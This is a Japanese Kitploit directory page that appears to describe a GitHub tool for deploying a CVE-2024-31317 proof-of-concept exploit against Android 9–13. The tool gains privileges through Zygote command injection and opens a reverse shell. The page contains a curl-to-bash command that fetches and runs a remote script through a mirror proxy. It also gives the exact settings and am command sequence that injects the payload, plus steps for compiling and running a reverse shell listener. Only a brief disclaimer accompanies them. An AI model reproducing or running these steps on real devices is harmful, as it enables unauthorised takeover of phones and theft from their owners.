Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-31317-PoC-Deployer — Android 9-13 向け CVE-2024-31317 PoC の自動デプロイツール。Zygote インジェクションとリバースシェル実行を通じた権限昇格を可能にします。 | Kitploit
ツール/GitHubGitHub/webldix/cve-2024-31317-poc-deployer
Androidセキュリティ特権昇格エクスプロイトシェルコードペネトレーションテストモバイルセキュリティペイロード開発バイナリエクスプロイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
webldix/cve-2024-31317-poc-deployer

CVE-2024-31317-PoC-Deployer

Android 9-13 向け CVE-2024-31317 PoC の自動デプロイツール。Zygote インジェクションとリバースシェル実行を通じた権限昇格を可能にします。

リポジトリを見る
528671年前Kitploit レビュー済み

CVE-2024-31317-PoC-Deployer

Android Version Patch Level License

Android 9 から 13 のデバイスを対象とした CVE-2024-31317 概念実証エクスプロイトのデプロイツールです。

📝 プロジェクト説明

CVE-2024-31317-PoC-Deployer は、CVE-2024-31317 の脆弱性を悪用するために必要なすべてのファイルをすばやく生成・設定する自動化デプロイスクリプトです。この脆弱性は Android 9 から 13 のデバイスに影響し、Zygote プロセスを介した権限昇格と任意のコード実行を可能にします。

🚨 脆弱性情報

  • CVE ID: CVE-2024-31317
  • 影響範囲: Android 9 から Android 13
  • 修正バージョン: 2024年6月のパッチレベル以降のAndroidバージョン
  • 脆弱性の種類: Zygoteプロセスのコマンドインジェクション
  • 必要な権限: WRITE_SECURE_SETTINGS

📦 同梱ファイル

  • reverse_shell.c - C言語で実装されたリバースシェルプログラム
  • payload.txt - 特別に細工されたエクスプロイトペイロード
  • compile.sh - 自動コンパイルスクリプト
  • README.txt - 詳細な使用説明
  • CVE-2024-31317.txt - 脆弱性の技術分析ドキュメント

🛠️ クイックスタート

  1. リモートデプロイスクリプトを実行する:

    root@kitploit:~
    pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
    
  2. リバースシェルをコンパイルする:

    root@kitploit:~
    sh compile.sh
    
  3. リバースシェルリスナーを実行する:

    root@kitploit:~
    sh reverse_shell
    

💣 エクスプロイト手順

  1. payload.txt をターゲットデバイスの /data/local/tmp/ にアップロードする
  2. payload.txt 内の xxx.xxx.xxx を自分のリスナーサーバーのIPアドレスに置き換える
  3. ターゲットデバイスで以下のコマンドシーケンスを実行する:
    root@kitploit:~
    am force-stop com.android.settings
    cd /data/local/tmp/
    settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
    am start -n com.android.settings/.Settings
    settings put global hidden_api_blacklist_exemptions "null"
    

⚠️ 免責事項

このツールは、合法的なセキュリティテストおよび研究目的でのみ使用してください。使用前にターゲットシステムの明確な承認を得る必要があります。無断使用は法律違反となる可能性があります。開発者はいかなる不正使用に対しても責任を負いません。

📜 ライセンス

このプロジェクトは MIT ライセンスの下で提供されています。詳細は LICENSE ファイルを参照してください。

📚 技術リファレンス

  • Android Security Bulletin - June 2024
  • CVE-2024-31317 Details
ツールをダウンロード